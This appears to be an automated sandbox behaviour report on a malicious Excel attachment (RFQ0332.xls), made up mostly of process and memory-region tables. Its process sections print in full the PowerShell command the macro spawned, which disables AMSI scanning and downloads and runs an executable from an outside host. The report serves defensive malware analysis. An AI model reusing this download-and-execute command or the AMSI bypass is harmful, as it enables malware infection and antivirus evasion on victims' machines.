49d9e68dbb6a4bfc5122545b2150adfc3b0ac99f717a1676a5de1e6865c8143b (SHA256)
share.cgissid07Ua3Tpfid07Ua3TpfilenameRFQ0332.xlsopenfolderforcedownloadep.xls
Excel Document
Created at 2018-04-18 14:33:00
Monitored Processes
Behavior Information - Grouped by Category
Process #1: excel.exe
59
0
| Information | Value |
|---|---|
| ID | #1 |
| File Name | c:\program files (x86)\microsoft office\office12\excel.exe |
| Command Line | "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:00:57, Reason: Analysis Target |
| Unmonitor | End Time: 00:16:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:15:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x79c |
| Parent PID | 0x520 (c:\windows\explorer.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
898
0x
894
0x
890
0x
88C
0x
888
0x
884
0x
880
0x
878
0x
870
0x
86C
0x
868
0x
864
0x
81C
0x
814
0x
810
0x
80C
0x
808
0x
804
0x
740
0x
280
0x
0
0x
948
0x
94C
0x
950
0x
954
0x
958
0x
95C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00022fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00070000 | 0x000d6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x000f2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00103fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00127fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0017ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0019ffff | Private Memory | - |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001fffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002c0000 | 0x002c0000 | 0x002c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x00557fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0056ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000005f0000 | 0x005f0000 | 0x00770fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000780000 | 0x00780000 | 0x0078ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x0088ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000890000 | 0x00890000 | 0x01c8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c90000 | 0x01c90000 | 0x01d6efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001d70000 | 0x01d70000 | 0x01d8ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000001d90000 | 0x01d90000 | 0x01d90fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001da0000 | 0x01da0000 | 0x01daffff | Private Memory | Readable, Writable |
|
|
|
- |
| office.odf | 0x01db0000 | 0x01fe9fff | Memory Mapped File | Readable |
|
|
|
- |
| xlintl32.dll | 0x01ff0000 | 0x02199fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000021a0000 | 0x021a0000 | 0x021a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000021b0000 | 0x021b0000 | 0x021b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000021c0000 | 0x021c0000 | 0x021c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002210000 | 0x02210000 | 0x02210fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0222ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x0223ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002240000 | 0x02240000 | 0x0224ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002250000 | 0x02250000 | 0x0225ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0226ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002270000 | 0x02270000 | 0x0227ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002280000 | 0x02280000 | 0x022bffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x022c0000 | 0x0258efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002590000 | 0x02590000 | 0x0259ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025a0000 | 0x025a0000 | 0x025a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000025b0000 | 0x025b0000 | 0x025b6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000025c0000 | 0x025c0000 | 0x025c1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x025d0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000025e0000 | 0x025e0000 | 0x0261ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002620000 | 0x02620000 | 0x0262ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002630000 | 0x02630000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002640000 | 0x02640000 | 0x0267ffff | Private Memory | Readable, Writable |
|
|
|
- |
| staticcache.dat | 0x02680000 | 0x02faffff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002fb0000 | 0x02fb0000 | 0x02fbffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002fc0000 | 0x02fc0000 | 0x02fcffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002fd0000 | 0x02fd0000 | 0x0300ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003010000 | 0x03010000 | 0x0308ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x0309ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030a0000 | 0x030a0000 | 0x030affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030b0000 | 0x030b0000 | 0x030bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030c0000 | 0x030c0000 | 0x030cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000030d0000 | 0x030d0000 | 0x031cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000031d0000 | 0x031d0000 | 0x031dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000031e0000 | 0x031e0000 | 0x031effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000031f0000 | 0x031f0000 | 0x031fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003200000 | 0x03200000 | 0x0320ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003210000 | 0x03210000 | 0x03211fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003220000 | 0x03220000 | 0x03220fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003230000 | 0x03230000 | 0x03235fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003240000 | 0x03240000 | 0x0324efff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003250000 | 0x03250000 | 0x03250fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003260000 | 0x03260000 | 0x0326ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003270000 | 0x03270000 | 0x03278fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003280000 | 0x03280000 | 0x03288fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003290000 | 0x03290000 | 0x0329ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032a0000 | 0x032a0000 | 0x032dffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000032e0000 | 0x032e0000 | 0x032e8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x032fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003300000 | 0x03300000 | 0x0330ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003310000 | 0x03310000 | 0x0340ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003410000 | 0x03410000 | 0x0341ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003420000 | 0x03420000 | 0x0342ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003430000 | 0x03430000 | 0x03430fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003440000 | 0x03440000 | 0x0353ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003540000 | 0x03540000 | 0x0363ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003640000 | 0x03640000 | 0x0364ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003650000 | 0x03650000 | 0x0365ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003660000 | 0x03660000 | 0x0369ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000036a0000 | 0x036a0000 | 0x036a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000036b0000 | 0x036b0000 | 0x036b0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000036c0000 | 0x036c0000 | 0x036cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000036d0000 | 0x036d0000 | 0x036d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000036e0000 | 0x036e0000 | 0x036e0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000036f0000 | 0x036f0000 | 0x036f0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003700000 | 0x03700000 | 0x03702fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003710000 | 0x03710000 | 0x0371ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003720000 | 0x03720000 | 0x0372bfff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003730000 | 0x03730000 | 0x03731fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003740000 | 0x03740000 | 0x0377ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003780000 | 0x03780000 | 0x03780fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003790000 | 0x03790000 | 0x037cffff | Private Memory | Readable, Writable |
|
|
|
- |
| wdmaud.drv.mui | 0x037d0000 | 0x037d0fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| mmdevapi.dll.mui | 0x037e0000 | 0x037e0fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x00000000037f0000 | 0x037f0000 | 0x037f1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003800000 | 0x03800000 | 0x0380ffff | Private Memory | - |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x03810000 | 0x0382efff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000003830000 | 0x03830000 | 0x03830fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003840000 | 0x03840000 | 0x03841fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| comdlg32.dll.mui | 0x03850000 | 0x0385cfff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000003860000 | 0x03860000 | 0x03861fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000003870000 | 0x03870000 | 0x03871fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003880000 | 0x03880000 | 0x03880fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003890000 | 0x03890000 | 0x03892fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000038a0000 | 0x038a0000 | 0x038a2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000038b0000 | 0x038b0000 | 0x038effff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000038f0000 | 0x038f0000 | 0x03ce2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000003cf0000 | 0x03cf0000 | 0x03cf2fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003d00000 | 0x03d00000 | 0x03d3ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003d40000 | 0x03d40000 | 0x03d40fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003d50000 | 0x03d50000 | 0x03d52fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003d60000 | 0x03d60000 | 0x03e5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003e60000 | 0x03e60000 | 0x03f5ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f60000 | 0x03f60000 | 0x03f6ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003f70000 | 0x03f70000 | 0x03faffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003fb0000 | 0x03fb0000 | 0x03fb1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003fc0000 | 0x03fc0000 | 0x03fd1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000003fe0000 | 0x03fe0000 | 0x03ff1fff | Private Memory | Readable, Writable |
|
|
|
- |
| cversions.2.db | 0x04000000 | 0x04003fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000004010000 | 0x04010000 | 0x04010fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004020000 | 0x04020000 | 0x0405ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004060000 | 0x04060000 | 0x04060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000004070000 | 0x04070000 | 0x04070fff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 303 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
COM (1)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | WScript.Shell | IUnknown | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER |
|
1 |
File (3)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (1)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read Value | 8804558B-B773-11d1-BC3E-0000F87552E7 | data = } |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | powershell.exe -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA + '\aap6.exe') {Remove-Item $env:APPDATA + '\aap6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://3lionsfactory.ga/out/linit.exe', $env:APPDATA + '\aap6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\aap6.exe'); Stop-Process -Id $Pid -Force | - |
|
1 |
Module (28)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL | base_address = 0x65300000 |
|
1 | |
| Get Handle | KERNEL32.DLL | base_address = 0x75fb0000 |
|
2 | |
| Get Handle | kernel32.dll | base_address = 0x75fb0000 |
|
1 | |
| Get Handle | KERNEL32 | base_address = 0x75fb0000 |
|
1 | |
| Get Handle | Unknown module name | base_address = 0x2fa10000 |
|
1 | |
| Get Handle | USER32 | base_address = 0x771c0000 |
|
1 | |
| Get Handle | ole32.dll | base_address = 0x75be0000 |
|
1 | |
| Get Filename | - | process_name = c:\program files (x86)\microsoft office\office12\excel.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE, size = 260 |
|
1 | |
| Get Filename | - | process_name = c:\program files (x86)\microsoft office\office12\excel.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 |
|
2 | |
| Get Address | Unknown module name | function = FlsAlloc, address_out = 0x75fc4f2b |
|
1 | |
| Get Address | Unknown module name | function = FlsGetValue, address_out = 0x75fc1252 |
|
1 | |
| Get Address | Unknown module name | function = FlsSetValue, address_out = 0x75fc4208 |
|
1 | |
| Get Address | Unknown module name | function = FlsFree, address_out = 0x75fc359f |
|
1 | |
| Get Address | Unknown module name | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fc1916 |
|
1 | |
| Get Address | Unknown module name | function = EncodePointer, address_out = 0x77c20fcb |
|
1 | |
| Get Address | Unknown module name | function = DecodePointer, address_out = 0x77c19d35 |
|
1 | |
| Get Address | Unknown module name | function = IsProcessorFeaturePresent, address_out = 0x75fc5235 |
|
1 | |
| Get Address | Unknown module name | function = GetSystemMetrics, address_out = 0x771d7d2f |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromWindow, address_out = 0x771e3150 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromRect, address_out = 0x771fe7a0 |
|
1 | |
| Get Address | Unknown module name | function = MonitorFromPoint, address_out = 0x771e5281 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayMonitors, address_out = 0x771e451a |
|
1 | |
| Get Address | Unknown module name | function = GetMonitorInfoA, address_out = 0x771e4413 |
|
1 | |
| Get Address | Unknown module name | function = EnumDisplayDevicesA, address_out = 0x771e4572 |
|
1 | |
| Get Address | Unknown module name | function = CoCreateInstanceEx, address_out = 0x75c29d4e |
|
1 | |
| Get Address | Unknown module name | function = CLSIDFromProgIDEx, address_out = 0x75bf0782 |
|
1 |
Keyboard (12)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Read | virtual_key_code = VK_ESCAPE, result_out = 0 |
|
12 |
System (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = Ticks, time = 201116 |
|
7 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #2: powershell.exe
927
16
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\syswow64\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -noprofile [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);If (test-path $env:APPDATA + '\aap6.exe') {Remove-Item $env:APPDATA + '\aap6.exe'}; $OEKQD = New-Object System.Net.WebClient; $OEKQD.Headers['User-Agent'] = 'USR-KL'; $OEKQD.DownloadFile('http://3lionsfactory.ga/out/linit.exe', $env:APPDATA + '\aap6.exe'); (New-Object -com Shell.Application).ShellExecute($env:APPDATA + '\aap6.exe'); Stop-Process -Id $Pid -Force |
| Initial Working Directory | C:\Users\kFT6uTQW\Desktop\ |
| Monitor | Start Time: 00:01:17, Reason: Child Process |
| Unmonitor | End Time: 00:16:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:14:45 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x960 |
| Parent PID | 0x79c (c:\program files (x86)\microsoft office\office12\excel.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | XABNCPUWKW\kFT6uTQW |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
964
0x
97C
0x
980
0x
984
0x
988
0x
98C
0x
990
0x
9AC
0x
9B0
0x
9B4
0x
9E8
0x
9EC
0x
9F0
0x
9F4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00060fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00071fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| powershell.exe.mui | 0x00080000 | 0x00082fff | Memory Mapped File | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000effff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x000f0000 | 0x00156fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0019ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00397fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x006b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000006c0000 | 0x006c0000 | 0x006c1fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000006d0000 | 0x006d0000 | 0x006d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db | 0x006e0000 | 0x006fefff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000700000 | 0x00700000 | 0x00700fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000710000 | 0x00710000 | 0x0074ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000750000 | 0x00750000 | 0x0078ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00790fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007a0000 | 0x007a0000 | 0x007dffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000007e0000 | 0x007e0000 | 0x007effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x0082ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000830000 | 0x00830000 | 0x00830fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0084ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000850000 | 0x00850000 | 0x0085ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000000860000 | 0x00860000 | 0x0086ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000870000 | 0x00870000 | 0x01c6ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x01d4efff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x01d50000 | 0x0201efff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000002020000 | 0x02020000 | 0x0205ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002060000 | 0x02060000 | 0x0206ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002070000 | 0x02070000 | 0x0207ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002080000 | 0x02080000 | 0x0208ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000002090000 | 0x02090000 | 0x020cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020d0000 | 0x020d0000 | 0x020dffff | Private Memory | - |
|
|
|
- |
| private_0x00000000020e0000 | 0x020e0000 | 0x0211ffff | Private Memory | Readable, Writable |
|
|
|
- |
